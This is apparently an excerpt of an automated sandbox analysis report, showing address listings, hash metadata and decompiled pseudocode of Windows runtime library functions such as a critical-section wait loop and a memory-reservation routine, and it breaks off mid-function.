                                                                                            0x04d0fb6e
                                                                                            0x04d0fb70
                                                                                            0x04d0fb72
                                                                                            0x00000000
                                                                                            0x04d0fb78
                                                                                            0x04d0fb7a
                                                                                            0x04d0fb7a
                                                                                            0x04d0fb7d
                                                                                            0x04d0fb80
                                                                                            0x04d4bddf
                                                                                            0x04d4bde1
                                                                                            0x00000000
                                                                                            0x04d4bde3
                                                                                            0x00000000
                                                                                            0x04d4bde3
                                                                                            0x04d0fb86
                                                                                            0x04d0fb86
                                                                                            0x04d0fb86
                                                                                            0x04d0fb8b
                                                                                            0x04d0fb90
                                                                                            0x04d0fb92
                                                                                            0x04d0fb94
                                                                                            0x04d0fb9a
                                                                                            0x04d0fb9b
                                                                                            0x04d0fba1
                                                                                            0x04d4bde8
                                                                                            0x04d4bdeb
                                                                                            0x04d4bded
                                                                                            0x04d4beb5
                                                                                            0x04d4beb5
                                                                                            0x04d4bebb
                                                                                            0x04d4bebd
                                                                                            0x04d4bec3
                                                                                            0x04d4bed2
                                                                                            0x04d4bedd
                                                                                            0x04d4bedd
                                                                                            0x04d4beed
                                                                                            0x00000000
                                                                                            0x04d4bdf3
                                                                                            0x04d4bdfe
                                                                                            0x04d4be06
                                                                                            0x04d4be0b
                                                                                            0x04d4be0d
                                                                                            0x04d4be0f
                                                                                            0x04d4be14
                                                                                            0x04d4be19
                                                                                            0x04d4be20
                                                                                            0x04d4be25
                                                                                            0x04d4be27
                                                                                            0x04d4be35
                                                                                            0x04d4be39
                                                                                            0x04d4be46
                                                                                            0x04d4be4f
                                                                                            0x04d4be54
                                                                                            0x04d4be56
                                                                                            0x04d4bef8
                                                                                            0x04d4bef8
                                                                                            0x00000000
                                                                                            0x04d4be5c
                                                                                            0x04d4be5c
                                                                                            0x04d4be60
                                                                                            0x00000000
                                                                                            0x04d4be66
                                                                                            0x04d4be66
                                                                                            0x04d4be7f
                                                                                            0x04d4be84
                                                                                            0x04d4be87
                                                                                            0x04d4be89
                                                                                            0x04d4be8b
                                                                                            0x04d4be99
                                                                                            0x04d4be9d
                                                                                            0x04d4bea0
                                                                                            0x04d4beac
                                                                                            0x04d4beaf
                                                                                            0x04d4beb1
                                                                                            0x04d4beb3
                                                                                            0x04d4beb3
                                                                                            0x00000000
                                                                                            0x04d4bea2
                                                                                            0x04d4bea2
                                                                                            0x00000000
                                                                                            0x04d4bea2
                                                                                            0x04d4be8d
                                                                                            0x04d4be8d
                                                                                            0x04d4be92
                                                                                            0x00000000
                                                                                            0x04d4be92
                                                                                            0x04d4be8b
                                                                                            0x04d4be60
                                                                                            0x04d4be3b
                                                                                            0x04d4be3b
                                                                                            0x04d4be3e
                                                                                            0x00000000
                                                                                            0x04d4be40
                                                                                            0x04d4be40
                                                                                            0x04d4be44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d4be44
                                                                                            0x04d4be3e
                                                                                            0x04d4be29
                                                                                            0x04d4be29
                                                                                            0x00000000
                                                                                            0x04d4be29
                                                                                            0x04d4be27
                                                                                            0x00000000
                                                                                            0x04d0fba7
                                                                                            0x04d0fba7
                                                                                            0x04d0fbab
                                                                                            0x04d4bf02
                                                                                            0x04d0fbb1
                                                                                            0x04d0fbb1
                                                                                            0x04d0fbb8
                                                                                            0x04d0fbbd
                                                                                            0x04d0fbbd
                                                                                            0x04d0fbbf
                                                                                            0x04d0fbbf
                                                                                            0x04d0fbc5
                                                                                            0x04d0fbcb
                                                                                            0x04d0fbf8
                                                                                            0x04d0fbf8
                                                                                            0x04d0fbfa
                                                                                            0x00000000
                                                                                            0x04d0fc00
                                                                                            0x04d0fc00
                                                                                            0x04d0fc03
                                                                                            0x00000000
                                                                                            0x04d0fc09
                                                                                            0x04d0fc09
                                                                                            0x04d0fc0f
                                                                                            0x04d0fc15
                                                                                            0x04d0fc23
                                                                                            0x04d0fc23
                                                                                            0x04d0fc25
                                                                                            0x04d0fc27
                                                                                            0x04d0fc75
                                                                                            0x04d0fc7c
                                                                                            0x04d0fc84
                                                                                            0x00000000
                                                                                            0x04d0fc29
                                                                                            0x04d0fc29
                                                                                            0x04d0fc2d
                                                                                            0x04d0fc30
                                                                                            0x04d4bf0f
                                                                                            0x00000000
                                                                                            0x04d0fc36
                                                                                            0x04d0fc38
                                                                                            0x04d0fc3b
                                                                                            0x04d0fc41
                                                                                            0x04d4bf17
                                                                                            0x04d4bf19
                                                                                            0x04d4bf48
                                                                                            0x04d4bf4b
                                                                                            0x00000000
                                                                                            0x04d4bf1b
                                                                                            0x04d4bf22
                                                                                            0x04d4bf24
                                                                                            0x04d4bf26
                                                                                            0x00000000
                                                                                            0x04d4bf2c
                                                                                            0x04d4bf37
                                                                                            0x04d4bf39
                                                                                            0x04d4bf3b
                                                                                            0x00000000
                                                                                            0x04d4bf41
                                                                                            0x04d4bf41
                                                                                            0x04d4bf41
                                                                                            0x04d4bf41
                                                                                            0x04d4bf45
                                                                                            0x00000000
                                                                                            0x04d4bf45
                                                                                            0x04d4bf3b
                                                                                            0x04d4bf26
                                                                                            0x00000000
                                                                                            0x04d0fc47
                                                                                            0x04d0fc47
                                                                                            0x04d0fc49
                                                                                            0x04d0fcb2
                                                                                            0x04d0fcb4
                                                                                            0x04d0fcb6
                                                                                            0x04d0fcdc
                                                                                            0x04d0fcdc
                                                                                            0x00000000
                                                                                            0x04d0fcb8
                                                                                            0x04d0fcc3
                                                                                            0x04d0fcc5
                                                                                            0x04d0fcc7
                                                                                            0x00000000
                                                                                            0x04d0fcc9
                                                                                            0x04d0fcc9
                                                                                            0x04d0fccd
                                                                                            0x00000000
                                                                                            0x04d0fccd
                                                                                            0x04d0fcc7
                                                                                            0x00000000
                                                                                            0x04d0fc4b
                                                                                            0x04d0fc4b
                                                                                            0x04d0fc4e
                                                                                            0x04d0fc4e
                                                                                            0x04d0fc51
                                                                                            0x04d0fc51
                                                                                            0x04d0fc54
                                                                                            0x04d0fc5a
                                                                                            0x04d0fc5c
                                                                                            0x04d0fc5f
                                                                                            0x04d0fc61
                                                                                            0x04d0fc63
                                                                                            0x04d0fc65
                                                                                            0x04d0fc67
                                                                                            0x04d0fc6e
                                                                                            0x04d0fc72
                                                                                            0x04d0fc72
                                                                                            0x04d0fc72
                                                                                            0x04d0fc72
                                                                                            0x04d0fc67
                                                                                            0x04d0fc61
                                                                                            0x00000000
                                                                                            0x04d0fc5a
                                                                                            0x04d0fc49
                                                                                            0x04d0fc41
                                                                                            0x04d0fc30
                                                                                            0x04d0fc27
                                                                                            0x04d0fc03
                                                                                            0x04d0fbcd
                                                                                            0x04d0fbd3
                                                                                            0x04d0fbd9
                                                                                            0x04d0fbdc
                                                                                            0x04d0fbde
                                                                                            0x04d0fc99
                                                                                            0x04d0fc9b
                                                                                            0x04d0fc9d
                                                                                            0x04d0fcd5
                                                                                            0x04d0fcd5
                                                                                            0x04d0fc89
                                                                                            0x04d0fc89
                                                                                            0x00000000
                                                                                            0x04d0fc9f
                                                                                            0x04d0fc9f
                                                                                            0x04d0fca3
                                                                                            0x00000000
                                                                                            0x04d0fca3
                                                                                            0x00000000
                                                                                            0x04d0fbe4
                                                                                            0x04d0fbe4
                                                                                            0x04d0fbe4
                                                                                            0x04d0fbe4
                                                                                            0x04d0fbe9
                                                                                            0x04d0fbf2
                                                                                            0x00000000
                                                                                            0x04d0fbf2
                                                                                            0x04d0fbde
                                                                                            0x04d0fbcb
                                                                                            0x04d0fbab
                                                                                            0x04d0fc8b
                                                                                            0x04d0fc8b
                                                                                            0x04d0fc8c
                                                                                            0x04d0fb80
                                                                                            0x04d0fb72
                                                                                            0x04d0fb5e
                                                                                            0x04d0fc8d
                                                                                            0x04d0fc91
                                                                                            0x04d0fadf
                                                                                            0x04d0fadf
                                                                                            0x04d0fae1
                                                                                            0x04d0fae4
                                                                                            0x04d0fae7
                                                                                            0x04d0faec
                                                                                            0x04d0faf8
                                                                                            0x04d0fb00
                                                                                            0x04d0fb07
                                                                                            0x04d0fb0f
                                                                                            0x04d0fb0f
                                                                                            0x04d0fb07
                                                                                            0x00000000
                                                                                            0x04d0faf8
                                                                                            0x04d0fadd

                                                                                            Strings
                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04D4BE0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                            • API String ID: 0-865735534
                                                                                            • Opcode ID: 680efbd61264ecdbe162473463a800741bcb7395cfd470b8f6919b48050005d1
                                                                                            • Instruction ID: a11f62d7d564c232ca7ae0ab00e32e64ad59fe0cbf19cfdd55991578ac906e39
                                                                                            • Opcode Fuzzy Hash: 680efbd61264ecdbe162473463a800741bcb7395cfd470b8f6919b48050005d1
                                                                                            • Instruction Fuzzy Hash: 68A1E171B006068BEB35DF65C49077AB3A5FF84714F24856EE8469B6C0EBB4F9018B90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 63%
                                                                                            			E04CD2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4dc5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4dc7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04D197C0();
				}
				if( *0x4dc79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4dc79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04D01624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04CF7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04D6FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04D19520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04D0E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04D2DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4dc6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4dc6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04D19980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04D195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04CF7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04CF7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04D57016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04D6FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4dc5350;
							if(_t109 != 0x4dc5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04D6FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04D65720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                            0x04cd2d8a
                                                                                            0x04cd2d8a
                                                                                            0x04cd2d92
                                                                                            0x04cd2d96
                                                                                            0x04cd2d9e
                                                                                            0x04cd2da0
                                                                                            0x04cd2da3
                                                                                            0x04cd2da5
                                                                                            0x04cd2da8
                                                                                            0x04cd2dab
                                                                                            0x04cd2db2
                                                                                            0x04d2f9aa
                                                                                            0x04d2f9ab
                                                                                            0x04d2f9ae
                                                                                            0x04d2f9ae
                                                                                            0x04cd2db8
                                                                                            0x04cd2dc2
                                                                                            0x04d2f9b9
                                                                                            0x04d2f9be
                                                                                            0x04d2f9bf
                                                                                            0x04d2f9bf
                                                                                            0x04cd2dcf
                                                                                            0x04d2f9c9
                                                                                            0x04cd2dd5
                                                                                            0x04cd2dd5
                                                                                            0x04cd2dd5
                                                                                            0x04cd2dde
                                                                                            0x04cd2de1
                                                                                            0x04cd2e70
                                                                                            0x04cd2e72
                                                                                            0x04cd2e72
                                                                                            0x04cd2de7
                                                                                            0x04cd2deb
                                                                                            0x04cd2e7c
                                                                                            0x04cd2e83
                                                                                            0x04cd2e85
                                                                                            0x04cd2e8b
                                                                                            0x04cd2e8d
                                                                                            0x04cd2e92
                                                                                            0x04cd2e92
                                                                                            0x04cd2e85
                                                                                            0x04cd2df1
                                                                                            0x04cd2df7
                                                                                            0x04cd2df9
                                                                                            0x04cd2df9
                                                                                            0x04cd2dfc
                                                                                            0x04cd2dff
                                                                                            0x04cd2e02
                                                                                            0x00000000
                                                                                            0x04cd2e05
                                                                                            0x04cd2e0c
                                                                                            0x04d2f9d9
                                                                                            0x04cd2e12
                                                                                            0x04cd2e12
                                                                                            0x04cd2e12
                                                                                            0x04cd2e1a
                                                                                            0x04d2f9e3
                                                                                            0x04d2f9e9
                                                                                            0x04d2f9f0
                                                                                            0x04d2f9f6
                                                                                            0x04d2f9f8
                                                                                            0x04d2f9f8
                                                                                            0x04d2f9f0
                                                                                            0x04cd2e23
                                                                                            0x04d2fa02
                                                                                            0x04d2fa03
                                                                                            0x04d2fa05
                                                                                            0x04d2fa06
                                                                                            0x00000000
                                                                                            0x04cd2e29
                                                                                            0x04cd2e29
                                                                                            0x04cd2e2e
                                                                                            0x04cd2e34
                                                                                            0x04cd2e3e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd2e44
                                                                                            0x04cd2e47
                                                                                            0x04cd2e4d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd2e4f
                                                                                            0x04cd2e54
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cd2e5a
                                                                                            0x04cd2e5f
                                                                                            0x04cd2e9a
                                                                                            0x04cd2ea4
                                                                                            0x04cd2ea5
                                                                                            0x04cd2ea8
                                                                                            0x04cd2eaf
                                                                                            0x04cd2eb2
                                                                                            0x04cd2eb5
                                                                                            0x04d2fae9
                                                                                            0x04d2faeb
                                                                                            0x04d2faed
                                                                                            0x04d2faef
                                                                                            0x04d2faf7
                                                                                            0x04d2faf8
                                                                                            0x04d2fafd
                                                                                            0x04d2faff
                                                                                            0x04d2fb04
                                                                                            0x04d2fb04
                                                                                            0x04d2faff
                                                                                            0x04cd2ec0
                                                                                            0x04cd2ec4
                                                                                            0x04cd2ec6
                                                                                            0x04cd2ec8
                                                                                            0x04d2fb14
                                                                                            0x04d2fb18
                                                                                            0x04d2fb1e
                                                                                            0x04d2fb21
                                                                                            0x04d2fb21
                                                                                            0x04cd2ece
                                                                                            0x04cd2ece
                                                                                            0x04cd2ece
                                                                                            0x04cd2ed7
                                                                                            0x04cd2e61
                                                                                            0x04cd2e63
                                                                                            0x04d2fa6b
                                                                                            0x04d2fa71
                                                                                            0x04d2fa76
                                                                                            0x04d2fa78
                                                                                            0x04d2fa8a
                                                                                            0x04d2fa7a
                                                                                            0x04d2fa83
                                                                                            0x04d2fa83
                                                                                            0x04d2fa8f
                                                                                            0x04d2fa91
                                                                                            0x04d2fa97
                                                                                            0x04d2fa9d
                                                                                            0x04d2faa4
                                                                                            0x04d2faaa
                                                                                            0x04d2faaf
                                                                                            0x04d2fab1
                                                                                            0x04d2fac3
                                                                                            0x04d2fab3
                                                                                            0x04d2fabc
                                                                                            0x04d2fabc
                                                                                            0x04d2fac8
                                                                                            0x04d2facb
                                                                                            0x04d2fadf
                                                                                            0x04d2fadf
                                                                                            0x04d2facb
                                                                                            0x04d2faa4
                                                                                            0x04d2fa91
                                                                                            0x04cd2e6f
                                                                                            0x04cd2e6f
                                                                                            0x04cd2e5f
                                                                                            0x04d2fa13
                                                                                            0x04d2fa15
                                                                                            0x04d2fa17
                                                                                            0x04d2fa1f
                                                                                            0x04d2fa21
                                                                                            0x04d2fa22
                                                                                            0x04d2fa25
                                                                                            0x04d2fa28
                                                                                            0x04d2fa2f
                                                                                            0x04d2fa2f
                                                                                            0x04d2fa2a
                                                                                            0x04d2fa2a
                                                                                            0x04d2fa2a
                                                                                            0x04d2fa31
                                                                                            0x04d2fa34
                                                                                            0x04d2fa36
                                                                                            0x04d2fa3c
                                                                                            0x04d2fa3e
                                                                                            0x04d2fa41
                                                                                            0x04d2fa43
                                                                                            0x04d2fa45
                                                                                            0x04d2fa45
                                                                                            0x04d2fa41
                                                                                            0x04d2fa3c
                                                                                            0x04d2fa4a
                                                                                            0x04d2fa4f
                                                                                            0x04d2fa51
                                                                                            0x04d2fa53
                                                                                            0x04d2fa56
                                                                                            0x04d2fa5b
                                                                                            0x04d2fa5e
                                                                                            0x00000000
                                                                                            0x04d2fa5e
                                                                                            0x04cd2e23

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Re-Waiting
                                                                                            • API String ID: 0-316354757
                                                                                            • Opcode ID: 5e7ce837c52e335bf893b052c6e984b99c7cb872398f08732e0b22e22af9b714
                                                                                            • Instruction ID: 47ffefa796a5c8f6ce9ff45399e90e16e07129613f2670178253cb29affa49e3
                                                                                            • Opcode Fuzzy Hash: 5e7ce837c52e335bf893b052c6e984b99c7cb872398f08732e0b22e22af9b714
                                                                                            • Instruction Fuzzy Hash: E6612330B00655AFEB31DF68C950B7EB7B2FB45718F180AAADA52972C0D734B900E791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04DA0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04D9FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04DA1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04D19730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04D9A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04D9A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4dc8b04 >> 0x14) + (_v44 -  *0x4dc8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04CF7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04D9138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04CF7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04D8FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4dc8724 & 0x00000008) != 0) {
						E04D952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04DA15B5(0x4dc8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                            0x04da0eb7
                                                                                            0x04da0eb9
                                                                                            0x04da0ec0
                                                                                            0x04da0ec2
                                                                                            0x04da0ecd
                                                                                            0x04da105b
                                                                                            0x04da105b
                                                                                            0x04da1061
                                                                                            0x04da1066
                                                                                            0x04da1066
                                                                                            0x04da106b
                                                                                            0x04da1073
                                                                                            0x04da1073
                                                                                            0x04da0ed3
                                                                                            0x04da0ed6
                                                                                            0x04da0edc
                                                                                            0x04da0ee0
                                                                                            0x04da0ee7
                                                                                            0x04da0ef0
                                                                                            0x04da0ef5
                                                                                            0x04da0efa
                                                                                            0x04da0efc
                                                                                            0x04da0efd
                                                                                            0x04da0f03
                                                                                            0x04da0f04
                                                                                            0x04da0f06
                                                                                            0x04da0f07
                                                                                            0x04da0f09
                                                                                            0x04da0f0e
                                                                                            0x04da0f14
                                                                                            0x04da0f23
                                                                                            0x04da0f2d
                                                                                            0x04da0f34
                                                                                            0x04da0f34
                                                                                            0x04da0f14
                                                                                            0x04da0f52
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da0f58
                                                                                            0x04da0f73
                                                                                            0x04da0f74
                                                                                            0x04da0f79
                                                                                            0x04da0f7d
                                                                                            0x04da0f80
                                                                                            0x04da0f86
                                                                                            0x04da0fab
                                                                                            0x04da0fb5
                                                                                            0x04da0fc6
                                                                                            0x04da0fd1
                                                                                            0x04da0fe3
                                                                                            0x04da0fd3
                                                                                            0x04da0fdc
                                                                                            0x04da0fdc
                                                                                            0x04da0feb
                                                                                            0x04da1009
                                                                                            0x04da1009
                                                                                            0x04da1015
                                                                                            0x04da1027
                                                                                            0x04da1017
                                                                                            0x04da1020
                                                                                            0x04da1020
                                                                                            0x04da102f
                                                                                            0x04da103c
                                                                                            0x04da103c
                                                                                            0x04da1048
                                                                                            0x04da1050
                                                                                            0x04da1050
                                                                                            0x04da1055
                                                                                            0x00000000
                                                                                            0x04da1055
                                                                                            0x04da0f88
                                                                                            0x04da0f9e
                                                                                            0x04da0fa2
                                                                                            0x04da0fa9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da0fa9
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: ec30cb36dde06119c356a48bb74051631afce0f853ca9ef7170a9a7faa1911be
                                                                                            • Instruction ID: 4f8fcf016a154ecb3cb9960a0bbe7930e6e2f198c553bd452a271b5eae00e426
                                                                                            • Opcode Fuzzy Hash: ec30cb36dde06119c356a48bb74051631afce0f853ca9ef7170a9a7faa1911be
                                                                                            • Instruction Fuzzy Hash: C951A9713083829FE726DF28D984B2BB7E5EB84314F044A2DF99697290D670F815CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E04D0F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04CF4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04D19830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04D19990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04D195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xd02bb81a
							_t109 = L04CF4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
